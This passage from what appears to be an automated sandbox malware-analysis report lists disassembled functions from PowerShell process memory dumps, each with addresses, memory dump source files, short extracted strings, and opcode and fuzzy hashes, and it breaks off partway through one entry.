                                            Function 00007FFAAC5D532D Relevance: .3, Instructions: 321COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1928152328.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7ffaac5d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 628179f742c2fba9d0df8a6f597af4b5f843f4368036f2110ae00c2c035de6c7
                                            • Instruction ID: 5a49bbb6bc667137257aee84aa713f0e6e955ff2636504a2912f447002f9a759
                                            • Opcode Fuzzy Hash: 628179f742c2fba9d0df8a6f597af4b5f843f4368036f2110ae00c2c035de6c7
                                            • Instruction Fuzzy Hash: 55A147A194EB8B8FFB97D76848556B97BD5EF42221B8841BBE04DC7193DD08DC088391
                                            Function 00007FFAAC50C030 Relevance: .3, Instructions: 273COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1926878601.00007FFAAC500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC500000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7ffaac500000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8cdcd13fe34d20172590964a9a4e6bb45f1ae18d60e85f7b4ee29783adea240b
                                            • Instruction ID: 9b39d03faa9f94d09396a6e92765e34600fe6a4e8931894c0d1946a11c0b3d19
                                            • Opcode Fuzzy Hash: 8cdcd13fe34d20172590964a9a4e6bb45f1ae18d60e85f7b4ee29783adea240b
                                            • Instruction Fuzzy Hash: A5813C7061CA4A8FE788EB1CC495AB5B7D1EFA7310B10457DE08EC32A7DA25F846C781
                                            Function 00007FFAAC5D42E7 Relevance: .2, Instructions: 159COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1928152328.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7ffaac5d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 08b3f012e4a8da9130bb66580d890b2a9cf2475e15ab06dee7e5a5f12947f1b5
                                            • Instruction ID: 858a36efe91dfcbdfe5ecb6190c2ede4e886c932a771731abaa85b0fbccf74e3
                                            • Opcode Fuzzy Hash: 08b3f012e4a8da9130bb66580d890b2a9cf2475e15ab06dee7e5a5f12947f1b5
                                            • Instruction Fuzzy Hash: 6A51F46294FBCB8FF796D76C88546B86AD5EF42210B5845BBE04DC31D3DE1CE8888391
                                            Function 00007FFAAC5D5452 Relevance: .1, Instructions: 114COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1928152328.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7ffaac5d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 34b8dac28135f05324bd1c4259373ebdb458da1b10e38675dca889bb37d0fd7d
                                            • Instruction ID: 28a8d451add1283c07f574d4bcb8c25f2a1ab4d8a9d27869ef347eb0be1c9deb
                                            • Opcode Fuzzy Hash: 34b8dac28135f05324bd1c4259373ebdb458da1b10e38675dca889bb37d0fd7d
                                            • Instruction Fuzzy Hash: 46313992D5FB878BFB97D36858556B86AC5EF42261BD845BBF44EC30D3ED0C980842C2
                                            Function 00007FFAAC503945 Relevance: .0, Instructions: 49COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1926878601.00007FFAAC500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC500000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7ffaac500000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0f03787480d0f4963d98fe369b589509d2f668ec686019fb8be855837160feb8
                                            • Instruction ID: 09563ab012930f3270728f3db2756cf351b4402cfcf0ebad616bb2c0c31317f7
                                            • Opcode Fuzzy Hash: 0f03787480d0f4963d98fe369b589509d2f668ec686019fb8be855837160feb8
                                            • Instruction Fuzzy Hash: 1F01677115CB0D8FDB88EF0CE451AA5B7E0FB95364F10056DF58AC3661DA36E881CB46

                                            Non-executed Functions

                                            Function 00007FFAAC50044D Relevance: 7.6, Strings: 6, Instructions: 105COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1926878601.00007FFAAC500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC500000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7ffaac500000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (0,$8,,$P/,$p0,$-,$/,
                                            • API String ID: 0-3007776325
                                            • Opcode ID: 15118784e318963e07406a49a595ebf658ede3f0632e0f57a52111bdbcb7a990
                                            • Instruction ID: 86ebcc9038ca86b344d4dc14617f197e27e4dbb79bd89a0a5decdb56601e018a
                                            • Opcode Fuzzy Hash: 15118784e318963e07406a49a595ebf658ede3f0632e0f57a52111bdbcb7a990
                                            • Instruction Fuzzy Hash: 0F31918394F7C29FF3569BA818650786FA4AF9325070D85FFE0CD8A49B9908DD0C83D9

                                            Executed Functions

                                            Function 02D6E928 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.1664678878.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_2d60000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: \VJm
                                            • API String ID: 0-4047210350
                                            • Opcode ID: b93711c71f3f192f409b77ef0b3b49137dbd2c62f4026486a028f183a7eac9b0
                                            • Instruction ID: 05435c037fc7da3afb018757ad487188670574556caf315615d5bdb5ee48d233
                                            • Opcode Fuzzy Hash: b93711c71f3f192f409b77ef0b3b49137dbd2c62f4026486a028f183a7eac9b0
                                            • Instruction Fuzzy Hash: 8DB12C74E00219CFDB24CFA9D889BADBBF2BF88314F148529D815A7394EB749C45CB81
                                            Function 02D6F1F8 Relevance: .3, Instructions: 266COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.1664678878.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_2d60000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bb8648e1b2303646e04ca0290a1f7dc5c20ad9265aab27359e5a615fe3f1fa1b
                                            • Instruction ID: c894d44a98c99edcd25d1c33ca1ff3b7013aa1fbfb9abd568138338ed43ecb18
                                            • Opcode Fuzzy Hash: bb8648e1b2303646e04ca0290a1f7dc5c20ad9265aab27359e5a615fe3f1fa1b
                                            • Instruction Fuzzy Hash: F7B13D70E006098FDB24CFA9E8897ADBBF2BB88314F148529D456E7794EB749C45CB81
                                            Function 073CB7BD Relevance: 15.7, Strings: 12, Instructions: 704COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.1674557319.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_73c0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q
                                            • API String ID: 0-663938088
                                            • Opcode ID: 054f8b4c3d5f45030dde78a76f46e2d463a651357ed958123d6f3942466553f5
                                            • Instruction ID: 2c5e585a8a5a767ed5ba0d28f7eb56c04576f7b578725ca7973020e7cd3dd060
                                            • Opcode Fuzzy Hash: 054f8b4c3d5f45030dde78a76f46e2d463a651357ed958123d6f3942466553f5
                                            • Instruction Fuzzy Hash: 746270B4A102199FEB64DB64C854BDEBBB2BB84304F10C5D9D9096B785CB31EE81CF91
                                            Function 073C58E0 Relevance: 13.5, Strings: 10, Instructions: 1045COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.1674557319.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_73c0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$tPq$tPq
                                            • API String ID: 0-3075684691
                                            • Opcode ID: ded909e9494ae2b13c32a95eeb4b77ba1a03b93fe8af4abc2776bf0c523fdcc0
                                            • Instruction ID: 6a591124f30d5cf78207a036cdb57d026d63d1cba364d26bd945d9908102f924
                                            • Opcode Fuzzy Hash: ded909e9494ae2b13c32a95eeb4b77ba1a03b93fe8af4abc2776bf0c523fdcc0
                                            • Instruction Fuzzy Hash: 069295B4A00315DFEB24CB58C851B9ABBB6BF85310F14C5AED909AB755CB31EC81CB91
                                            Function 073C7090 Relevance: 7.8, Strings: 6, Instructions: 339COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.1674557319.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_73c0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$4'q$4'q$4'q$4'q
                                            • API String ID: 0-1794337482
                                            • Opcode ID: 7fa4b0da96cebd022499beeb953617ce2c83f246c8edcab42a65d7d971055cb1
                                            • Instruction ID: b02d9cc9671b4d8f6ff4a983ce937b3197af5a5ab16588b4aa010ab870eae895
                                            • Opcode Fuzzy Hash: 7fa4b0da96cebd022499beeb953617ce2c83f246c8edcab42a65d7d971055cb1
                                            • Instruction Fuzzy Hash: 5CD18FB4B002099FEB14DB68C454B9EBBB2AF89304F14C459ED056F795CB71EC428FA1
                                            Function 073C7089 Relevance: 4.0, Strings: 3, Instructions: 259COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.1674557319.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_73c0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$4'q
                                            • API String ID: 0-3126650252
                                            • Opcode ID: 6639ab0a3b080911f17d20cf21f42f966c5ddf7932fe3ab853c190bc110cf534
                                            • Instruction ID: 19b5149ecbd4126ddcf867f1c8f155c3cdea2c689d091a948fe4680940b58ea8
                                            • Opcode Fuzzy Hash: 6639ab0a3b080911f17d20cf21f42f966c5ddf7932fe3ab853c190bc110cf534
                                            • Instruction Fuzzy Hash: C2A17BB4A002199FEB14CF54C550BAEBBB2AB89304F14C559ED096F795CB32EC46CFA1
                                            Function 073C0767 Relevance: 3.9, Strings: 3, Instructions: 110COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.1674557319.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_73c0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$$q
                                            • API String ID: 0-3927140803
                                            • Opcode ID: 635706433606cd9ad2ff6be8d22a1fab4ecb2555d8ffaed1a0ec7101a24ca010
                                            • Instruction ID: b4ff1f400e94f2ce4003ff42aec5e1b8f26929896becf50ae7cee6dd8e37cf47
                                            • Opcode Fuzzy Hash: 635706433606cd9ad2ff6be8d22a1fab4ecb2555d8ffaed1a0ec7101a24ca010
                                            • Instruction Fuzzy Hash: 003106F2B00396CBFB2C86689D1127AB796EF81215B14C46ED9469B681DA32CC51C7E2
                                            Function 073C47D0 Relevance: 2.9, Strings: 2, Instructions: 439COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.1674557319.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_73c0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: tPq$tPq
                                            • API String ID: 0-4270251778
                                            • Opcode ID: afa19d5dfdcd49275e1084ff1cfe0149b374fc8d66e08fda531cb49c515e17d6
                                            • Instruction ID: 848fe1c2c96ab3c5dbc3fa64288db83295370b35e79e0585a9cdf8be9411d8ca
                                            • Opcode Fuzzy Hash: afa19d5dfdcd49275e1084ff1cfe0149b374fc8d66e08fda531cb49c515e17d6
                                            • Instruction Fuzzy Hash: F7F1B4B4B002559FEB14DB64C560BAABFE2AF85310F14C46DE909AF795CB31EC41CB91
                                            Function 073CCBF1 Relevance: 2.9, Strings: 2, Instructions: 397COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.1674557319.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_73c0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q
                                            • API String ID: 0-1467158625
                                            • Opcode ID: 087e388f6cf614d8feb46e2eb671862f1d4abd42c5181ebfac8373e926b0dc7c
                                            • Instruction ID: ffbcac50906d5c5f084ade42345fdf497f530ea23b253252eea02ba587f5a4d1
                                            • Opcode Fuzzy Hash: 087e388f6cf614d8feb46e2eb671862f1d4abd42c5181ebfac8373e926b0dc7c
                                            • Instruction Fuzzy Hash: 0D025EB4A502199FEB64DB64C950BDEBBB2BB45300F10C1E9D909AB751CB31EE81CF91
                                            Function 073C62F3 Relevance: 2.9, Strings: 2, Instructions: 387COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.1674557319.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_73c0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q
                                            • API String ID: 0-1467158625
                                            • Opcode ID: 8e906f8869bd7c4c041c96a9fcd260298924fb47460e819a7be9ed375363dbe8
                                            • Instruction ID: 40cc107a710e1e7883b9d2101171af6474296f0ffec2206d0f5fed54d76f0556
                                            • Opcode Fuzzy Hash: 8e906f8869bd7c4c041c96a9fcd260298924fb47460e819a7be9ed375363dbe8
                                            • Instruction Fuzzy Hash: 5EF191B0A00315DFEB24DB54C951F9ABBB7AB84304F10C4A9D6096F795CB31ED868F91
                                            Function 073CBEE0 Relevance: 2.9, Strings: 2, Instructions: 363COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.1674557319.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_73c0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q
                                            • API String ID: 0-1467158625
                                            • Opcode ID: adfa6226dac1df3032a996f8fd44e5e7dd3f572cdf7bdd9c0ab58bcd828409bd
                                            • Instruction ID: d75c39f940e2ae87816a55b7c697799fa03fbabd82782f7b14e7b4dbc757a401
                                            • Opcode Fuzzy Hash: adfa6226dac1df3032a996f8fd44e5e7dd3f572cdf7bdd9c0ab58bcd828409bd
                                            • Instruction Fuzzy Hash: 44E171B0A402189FE764DB64CD54B9EBBB2BB84300F10C499DA09AF791CB75ED81CF91
                                            Function 073CE16D Relevance: 2.6, Strings: 2, Instructions: 126COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.1674557319.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_73c0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q
                                            • API String ID: 0-1467158625
                                            • Opcode ID: b3d2efa32715248734eb4d43fa0f50e8e7e70554698b62e408e889e32643a125
                                            • Instruction ID: 44b8851178d9b366547e7009b53e253966fe0080646b25b166b5b96b9c7c01ed
                                            • Opcode Fuzzy Hash: b3d2efa32715248734eb4d43fa0f50e8e7e70554698b62e408e889e32643a125
                                            • Instruction Fuzzy Hash: 65314CF178031A8BFB29E578D41037AB796ABC5211F2484BEC9069B6C5EE35CC51C3A2
                                            Function 02D6BDC4 Relevance: 2.6, Strings: 2, Instructions: 75COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.1664678878.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_2d60000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: h]Jm$IJm
                                            • API String ID: 0-714688229
                                            • Opcode ID: 81ea2f4c18127c3c87852a21304e689f206e27c539bf80d6779a13872d8fb92a
                                            • Instruction ID: 710443fdacb11d016ec958fc46170ac014273d175644a09e177d03246c39e4d4
                                            • Opcode Fuzzy Hash: 81ea2f4c18127c3c87852a21304e689f206e27c539bf80d6779a13872d8fb92a
                                            • Instruction Fuzzy Hash: 5D314330B011688FCB29AB74C854BEEB7B2AF89308F0504E9D50AAB755DF358E45CF81
                                            Function 02D6E923 Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.1664678878.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_2d60000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: \VJm
                                            • API String ID: 0-4047210350
                                            • Opcode ID: eb018a634eea33de4923d96d306e299ef7692945f322a9f38377bc62d800c142
                                            • Instruction ID: 14bef936c8fdef3a008bcd03a3eef1ee5dae03bd4a09935ce8140f6279f12950
                                            • Opcode Fuzzy Hash: eb018a634eea33de4923d96d306e299ef7692945f322a9f38377bc62d800c142
                                            • Instruction Fuzzy Hash: 89B11A74E00219CFDB24CFA9D889BADBBF2BF48314F148129E815A7394EB749845CF91
                                            Function 073C4DB8 Relevance: .7, Instructions: 741COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.1674557319.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_73c0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1487b73899093e6c5a71df464b545eb177d8cdee2605b6555702652335322b1c
                                            • Instruction ID: ab1f16873ae47b2855168dc2e69502250b5edd0407e702642836725b1a17c7c3
                                            • Opcode Fuzzy Hash: 1487b73899093e6c5a71df464b545eb177d8cdee2605b6555702652335322b1c
                                            • Instruction Fuzzy Hash: 57624DB4B00215CFEB14CB98C554A9ABBB2BF85304F24C16DD9099F795CB72EC86CB51
                                            Function 073C4DB3 Relevance: .5, Instructions: 542COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.1674557319.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_73c0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 66bc094c3e675e8bbb53872c9ba7d6312a4798aa7303ef2986c83bbf2a1298cc
                                            • Instruction ID: 9e4c12e5c9fd87a25f2c344fd00a7e1dac9e97379d5c345a82d882f52b337bfe
                                            • Opcode Fuzzy Hash: 66bc094c3e675e8bbb53872c9ba7d6312a4798aa7303ef2986c83bbf2a1298cc
                                            • Instruction Fuzzy Hash: 023239B4A00215CFEB14CF98C550E9ABBB6BB85314F25C16DD909AF796C772EC86CB40
                                            Function 073C552D Relevance: .5, Instructions: 483COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.1674557319.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_73c0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 556828a541050c33e6204e94c39383a6ab01097958bee00a2179ee43b374a731
                                            • Instruction ID: fb62c693474bd5fd56a48101b8183988f3018506de60c6fc58565df0d96f8ddf
                                            • Opcode Fuzzy Hash: 556828a541050c33e6204e94c39383a6ab01097958bee00a2179ee43b374a731
                                            • Instruction Fuzzy Hash: 51124BB4A00215DFEB14CF88C550E9ABBB2BB85304F24C16DD909AF795CB72EC96CB41
                                            Function 02D63670 Relevance: .3, Instructions: 310COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.1664678878.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_2d60000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f6cef835be17b2c939005868eac0bdbaafc85a6dfbfc16f977740c4e7a29b805
                                            • Instruction ID: e7680bb8cbf22ae15359ddd2be8884aa9498e7d4bc69a1efcc66b426b8a2dff9
                                            • Opcode Fuzzy Hash: f6cef835be17b2c939005868eac0bdbaafc85a6dfbfc16f977740c4e7a29b805
                                            • Instruction Fuzzy Hash: D7D10574E012489FDB55CFA8D488AADFBB2EF48314F248199E815AB355C731ED86CF90
                                            Function 02D68D38 Relevance: .3, Instructions: 266COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.1664678878.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_2d60000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8ae6beac9de763846992b7a1e6f15a6b3457c58ee35737b7faa209da7301cec8
                                            • Instruction ID: e137044d15cf0802860f7d93d96c74107931296357d6c9d38110e94345ceaef0
                                            • Opcode Fuzzy Hash: 8ae6beac9de763846992b7a1e6f15a6b3457c58ee35737b7faa209da7301cec8
                                            • Instruction Fuzzy Hash: 06A16B35A002489FDB14DFA4D958AADBBB6FF84314F218559E806AF364CB34ED49CF80
                                            Function 02D6F1EF Relevance: .3, Instructions: 261COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.1664678878.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_2d60000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 744ffcbd1f609e493cca133650bef4e70b31fd8bba25d614c4cbf7864bcdb57c
                                            • Instruction ID: 374a8a40b98a5746d7b8c8c1ecc933d293a5a99d9dbc37d78fe64f223aa6381e
                                            • Opcode Fuzzy Hash: 744ffcbd1f609e493cca133650bef4e70b31fd8bba25d614c4cbf7864bcdb57c
                                            • Instruction Fuzzy Hash: A0A12C70E006098FDB20CFA9E8897ADBBF2BF48314F148529D456E7794EB749885CF81
                                            Function 073CE4B0 Relevance: .2, Instructions: 236COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.1674557319.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_73c0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2bd49290df34c445d9ff6bf7b81ac7cedda49f7c55093b2ea0c363ed54d17448
                                            • Instruction ID: c7a717bc3ff21a172da35c9d21e47cbb115e7f5af9355463a56af08d4f837d5d
                                            • Opcode Fuzzy Hash: 2bd49290df34c445d9ff6bf7b81ac7cedda49f7c55093b2ea0c363ed54d17448
                                            • Instruction Fuzzy Hash: F6914CB4A50205DFEB14CB98C454A9EBBF6BF89314F14C069D909AB755CB32EC82CF61
                                            Function 02D68528 Relevance: .2, Instructions: 227COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.1664678878.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_2d60000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bbbd94495def518101ff3be30ad87fe48714b59049ddc06f78b76fe7123463c0
                                            • Instruction ID: 27880edfde83f75bd250f896ba7bdf80b113d7fb735ce74336a25c584a6ff184
                                            • Opcode Fuzzy Hash: bbbd94495def518101ff3be30ad87fe48714b59049ddc06f78b76fe7123463c0
                                            • Instruction Fuzzy Hash: 1B919030A002449FCB15DFA8D448AAEBBF2EF89354F1485A9E445EB761CB35EC89DB50
                                            Function 073CE4AF Relevance: .2, Instructions: 202COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.1674557319.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_73c0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1e057394666b45f7585dbc0e420b46a9bef499f79f6443650e48b867cf13cf05
                                            • Instruction ID: 7794ce1bdf4a2856a07854039faf15be2ce48196c59e90be1adcde0e2312c014
                                            • Opcode Fuzzy Hash: 1e057394666b45f7585dbc0e420b46a9bef499f79f6443650e48b867cf13cf05
                                            • Instruction Fuzzy Hash: 788139B4A50205DFEB14CF58C584E9ABBB6BF89314F55C069E908AB751C732EC81CF61
                                            Function 02D69488 Relevance: .2, Instructions: 194COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.1664678878.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_2d60000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fc42f35c6cff97deeb037f7c649d3c9922741969631719128824101e01ab9e77
                                            • Instruction ID: 87de636effdf3086956f8e2a691478208a96f894245fafe7bd1a473dcde6f403
                                            • Opcode Fuzzy Hash: fc42f35c6cff97deeb037f7c649d3c9922741969631719128824101e01ab9e77
                                            • Instruction Fuzzy Hash: D071AC31A002088FDB14DF68D894AEEBBF6FF85314F14896AD415EB750DB70AC46CB80
                                            Function 02D695F6 Relevance: .2, Instructions: 188COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.1664678878.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_2d60000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6929f7ea70b9576c579680cd11b6c948e033847cbb1fa4ff8a93a180e3e11fe2
                                            • Instruction ID: cac173e435928f4fad517bdc92ccdadafcc89e007d7fb64d23a71f8d95787817
                                            • Opcode Fuzzy Hash: 6929f7ea70b9576c579680cd11b6c948e033847cbb1fa4ff8a93a180e3e11fe2
                                            • Instruction Fuzzy Hash: E3711630E002489FDB14DFA5D494BEDBBB2BF88304F148969E452AB790DB35AC46CF91
                                            Function 02D69473 Relevance: .1, Instructions: 148COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.1664678878.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_2d60000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c2ae186595a703d1971ea51a114453f6b0913f19bf657ff1488d255feb87fbab
                                            • Instruction ID: b3ea32b665a04793585fa66d303e4681a5264dd7bc0f9b210e9d32eae97fe5b4
